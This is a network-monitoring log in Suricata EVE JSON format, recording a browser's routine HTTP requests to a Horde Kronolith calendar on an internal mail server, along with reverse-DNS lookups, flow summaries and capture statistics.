{"timestamp":"2020-02-29T00:12:44.548279+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52734,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/new.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":560},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/new.png","state":"CLOSED","stored":false,"size":560,"tx_id":12}} {"timestamp":"2020-02-29T00:12:44.548593+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52734,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":13,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/favicon.ico","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/vnd.microsoft.icon","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1742}} {"timestamp":"2020-02-29T00:12:44.600798+0000","flow_id":224552373988062,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":54903,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":64506,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:12:44.634787+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52734,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/favicon.ico","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/vnd.microsoft.icon","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1742},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/favicon.ico","state":"CLOSED","stored":false,"size":1742,"tx_id":13}} {"timestamp":"2020-02-29T00:12:44.709050+0000","flow_id":224552373988062,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":54903,"proto":"UDP","dns":{"type":"answer","id":64506,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:12:44.709050+0000","flow_id":224552373988062,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":54903,"proto":"UDP","dns":{"type":"answer","id":64506,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:12:44.752880+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52734,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":14,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listCalendars","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":639}} {"timestamp":"2020-02-29T00:12:44.752880+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52734,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listCalendars","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":639},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listCalendars","state":"CLOSED","stored":false,"size":29,"tx_id":14}} {"timestamp":"2020-02-29T00:12:44.795519+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52734,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listCalendars","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":639},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listCalendars","state":"CLOSED","stored":false,"size":1692,"tx_id":14}} {"timestamp":"2020-02-29T00:12:44.805646+0000","flow_id":1172073699101454,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":35264,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":24982,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:12:44.820640+0000","flow_id":618010033054210,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52738,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/sounds\/reminder.wav","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"audio\/x-wav","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":23151},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/sounds\/reminder.wav","state":"CLOSED","stored":false,"size":23151,"tx_id":0}} {"timestamp":"2020-02-29T00:12:44.820982+0000","flow_id":618010033054210,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52738,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/loading.gif","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/gif","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2494}} {"timestamp":"2020-02-29T00:12:44.838775+0000","flow_id":1572119837955811,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52736,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/tasks.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":614},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/tasks.png","state":"CLOSED","stored":false,"size":614,"tx_id":5}} {"timestamp":"2020-02-29T00:12:44.913873+0000","flow_id":1172073699101454,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":35264,"proto":"UDP","dns":{"type":"answer","id":24982,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} 
{"timestamp":"2020-02-29T00:12:44.913873+0000","flow_id":1172073699101454,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":35264,"proto":"UDP","dns":{"type":"answer","id":24982,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:12:44.958321+0000","flow_id":989009308065649,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":41034,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":56223,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:12:45.000735+0000","flow_id":150206485572827,"event_type":"flow","src_ip":"192.168.10.81","src_port":52726,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":20,"pkts_toclient":12,"bytes_toserver":4491,"bytes_toclient":7846,"start":"2020-02-29T00:11:35.994523+0000","end":"2020-02-29T00:11:43.053860+0000","age":8,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1f","tcp_flags_ts":"1f","tcp_flags_tc":"1b","syn":true,"fin":true,"rst":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:12:45.001038+0000","flow_id":1202052566297535,"event_type":"flow","src_ip":"192.168.10.81","src_port":52724,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":26,"pkts_toclient":25,"bytes_toserver":6852,"bytes_toclient":20641,"start":"2020-02-29T00:11:35.994239+0000","end":"2020-02-29T00:11:43.048709+0000","age":8,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1f","tcp_flags_ts":"1f","tcp_flags_tc":"1a","syn":true,"fin":true,"rst":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:12:45.001105+0000","flow_id":1062938575886898,"event_type":"flow","src_ip":"192.168.10.130","src_port":34802,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":5,"pkts_toclient":5,"bytes_toserver":1112,"bytes_toclient":890,"start":"2020-02-29T00:11:39.383538+0000","end":"2020-02-29T00:11:44.702752+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:12:45.001326+0000","flow_id":701495603006587,"event_type":"flow","src_ip":"192.168.10.130","src_port":34800,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":23,"pkts_toclient":26,"bytes_toserver":3440,"bytes_toclient":28434,"start":"2020-02-29T00:11:38.232571+0000","end":"2020-02-29T00:11:44.693708+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:12:45.066699+0000","flow_id":989009308065649,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":41034,"proto":"UDP","dns":{"type":"answer","id":56223,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:12:45.066699+0000","flow_id":989009308065649,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":41034,"proto":"UDP","dns":{"type":"answer","id":56223,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} 
{"timestamp":"2020-02-29T00:12:45.092413+0000","flow_id":1572119837955811,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52736,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":6,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":126}} {"timestamp":"2020-02-29T00:12:45.092413+0000","flow_id":1572119837955811,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52736,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":126},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":137,"tx_id":6}} {"timestamp":"2020-02-29T00:12:45.107378+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52734,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":972},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":128,"tx_id":15}} 
{"timestamp":"2020-02-29T00:12:45.107433+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52734,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":15,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":1137}} {"timestamp":"2020-02-29T00:12:47.000497+0000","flow_id":360397875076404,"event_type":"flow","src_ip":"192.168.10.122","src_port":46500,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:07:46.417076+0000","end":"2020-02-29T00:07:46.525040+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:12:49.000552+0000","flow_id":1491464643110889,"event_type":"flow","src_ip":"192.168.10.81","src_port":52728,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":4,"bytes_toserver":852,"bytes_toclient":659,"start":"2020-02-29T00:11:43.157673+0000","end":"2020-02-29T00:11:48.161299+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:12:49.822840+0000","flow_id":618010033054210,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52738,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/loading.gif","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/gif","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2494},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/loading.gif","state":"CLOSED","stored":false,"size":2494,"tx_id":1}} {"timestamp":"2020-02-29T00:12:50.000580+0000","flow_id":1914802374239664,"event_type":"flow","src_ip":"192.168.10.122","src_port":51696,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:07:48.976304+0000","end":"2020-02-29T00:07:49.084348+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:12:50.097220+0000","flow_id":1572119837955811,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52736,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":126},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":115,"tx_id":6}} {"timestamp":"2020-02-29T00:12:50.110860+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52734,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":1137},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":3298,"tx_id":15}} {"timestamp":"2020-02-29T00:12:50.949751+0000","flow_id":1932059572600311,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":49307,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":47381,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:12:50.954845+0000","flow_id":432368661990283,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52746,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/redbox_spinner.gif","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/gif","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6820}} 
{"timestamp":"2020-02-29T00:12:51.000251+0000","event_type":"stats","stats":{"uptime":14423,"capture":{"kernel_packets":135307,"kernel_drops":0},"decoder":{"pkts":135315,"bytes":93285532,"invalid":187,"ipv4":133822,"ipv6":8,"ethernet":135315,"raw":0,"null":0,"sll":0,"tcp":128534,"udp":5086,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":689,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097632},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2764,"ssn_memcap_drop":0,"pseudo":347,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2780,"synack":2771,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1803,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2323,"failed_udp":111},"tx":{"http":4654,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2403}},"flow_mgr":{"closed_pruned":2742,"new_pruned":15,"est_pruned":2367,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":22738,"memcap_state":0,"memcap_global":0},"http":{"memuse":101791,"memcap":0}}} 
{"timestamp":"2020-02-29T00:12:51.058015+0000","flow_id":1932059572600311,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49307,"proto":"UDP","dns":{"type":"answer","id":47381,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:12:51.058015+0000","flow_id":1932059572600311,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49307,"proto":"UDP","dns":{"type":"answer","id":47381,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:12:51.088686+0000","flow_id":1905800142540588,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52744,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/getEvent","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":343}} {"timestamp":"2020-02-29T00:12:51.088686+0000","flow_id":1905800142540588,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52744,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/getEvent","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":343},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/getEvent","state":"CLOSED","stored":false,"size":109,"tx_id":0}} 
{"timestamp":"2020-02-29T00:12:51.118278+0000","flow_id":340808549256710,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":59515,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":38583,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:12:51.150847+0000","flow_id":432368661990283,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52746,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/redbox_spinner.gif","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/gif","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6820},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/redbox_spinner.gif","state":"CLOSED","stored":false,"size":6820,"tx_id":0}} {"timestamp":"2020-02-29T00:12:51.226233+0000","flow_id":340808549256710,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59515,"proto":"UDP","dns":{"type":"answer","id":38583,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:12:51.226233+0000","flow_id":340808549256710,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59515,"proto":"UDP","dns":{"type":"answer","id":38583,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:12:51.252283+0000","flow_id":432368661990283,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52746,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listTopTags","http_user_agent":"Mozilla\/5.0 
(X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":121}} {"timestamp":"2020-02-29T00:12:51.252283+0000","flow_id":432368661990283,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52746,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listTopTags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":121},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listTopTags","state":"CLOSED","stored":false,"size":29,"tx_id":1}} {"timestamp":"2020-02-29T00:12:52.000314+0000","flow_id":872744524144809,"event_type":"flow","src_ip":"192.168.10.122","src_port":40322,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:07:51.417961+0000","end":"2020-02-29T00:07:51.525948+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:12:53.000241+0000","flow_id":859382880918804,"event_type":"flow","src_ip":"192.168.10.122","src_port":60758,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:07:51.908564+0000","end":"2020-02-29T00:07:52.016611+0000","age":1,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:12:56.090899+0000","flow_id":1905800142540588,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52744,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/getEvent","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":343},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/getEvent","state":"CLOSED","stored":false,"size":492,"tx_id":0}} {"timestamp":"2020-02-29T00:12:56.254011+0000","flow_id":432368661990283,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52746,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listTopTags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":121},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listTopTags","state":"CLOSED","stored":false,"size":128,"tx_id":1}} 
